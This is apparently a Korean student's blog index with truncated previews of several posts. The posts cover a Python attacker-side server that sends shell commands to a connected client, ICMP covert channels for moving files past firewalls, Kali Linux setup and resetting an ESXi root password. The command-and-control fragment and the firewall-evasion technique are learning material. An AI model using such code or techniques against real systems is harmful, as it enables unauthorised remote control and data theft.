학사 나부랭이

# server(Attacker) import socket def setSock(ip, port): # gives socket stream to use TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((ip, port)) s.listen(1) conn, addr = s.accept() return conn, addr def command(conn, addr): # send command to client print("[+] Connected to", addr) while True: command = input(">") if c..

네트워크에서 프로토콜은 약속이고 정의하기 나름이에요. 그러니, IP 헤더의 사용하지 않는 부분에 특정한 약속을 만들거나, ICMP 헤더의 데이터에 다른 프로토콜을 구현할 수도 있죠. 이런 방식으로 숨겨서 정보를 전송하는 네트워크 공격 기법이 은닉 채널(Covert Channel)이에요. 예를 들어, 방화벽 같은 장비에서 TCP, UDP 포트를 막았거나 감시할 때 이용해, 감시 장비를 우회해 파일을 전송할 수 있어요. PING은 거의 모든 운영체제에 설치되어 있는 도구며, 이를 이용한 코드로 TCP, UDP 포트가 막혀도 파일을 전송할 수 있어요. 이제 PING 기능을 이용해, ICMP의 메시지로 사진 파일을 전송할 거예요. # receiver's code from socket import * import..

칼리 리눅스는 데비안 계열의 모의 침투 테스트용 운영체제예요. 칼리라고해서 특별히 뭐가 있는게 아니라 관련 툴이 기본적으로 설치된 것 뿐이고 절반 쯤 감성으로 먹고 사는거죠. 먼저 설치 완료까지 한 다음 기본적인 한글 표시, 한글 입력 레이아웃 등은 인터넷에 잘 나와있으니 생략하고 나에게 필요한 기초 설정을 기록했어요. 1. Screen Shooter 윈도우에서 캡처도구라는 부분 캡처를 할 수 있는 프로그램이 있었는데 리눅스에서는 어떻게 할까요? 물론 서드파티 프로그램도 가능하겠으나 웬만하면 순정으로 가자는 주의이기에 xfce4-screenshooter라는 유틸리티를 사용하기로 해요. 2. 일본어 설정 먼저 한국어와 마찬가지로 지원하는 폰트부터 다운로드 받아줘요. 혹시 나중에 쓰일지도 모르고 크기도 얼마..

우리 동아리 서버는 요 조그만 USB에 들어있는 ESXi에 있지요~ 근데 인수인계가 어떻게 된 건지 아무도 루트 비밀번호를 모르네~ dotgabi.org DNS도 만료되었고요~ 시간도 남고 영어도 잘 하는 내가 처리해야지~ 거의 이거 단순 번역이라고 보면 돼용~ www.ferroquesystems.com/resource/howto-reset-a-vmware-esxi-root-password/ HowTo: Reset a VMware ESXi Root Password Many of us have been there, we manage our ESXi hosts via vCenter like a responsible adult. But alas, one day, vCenter goes haywire and i..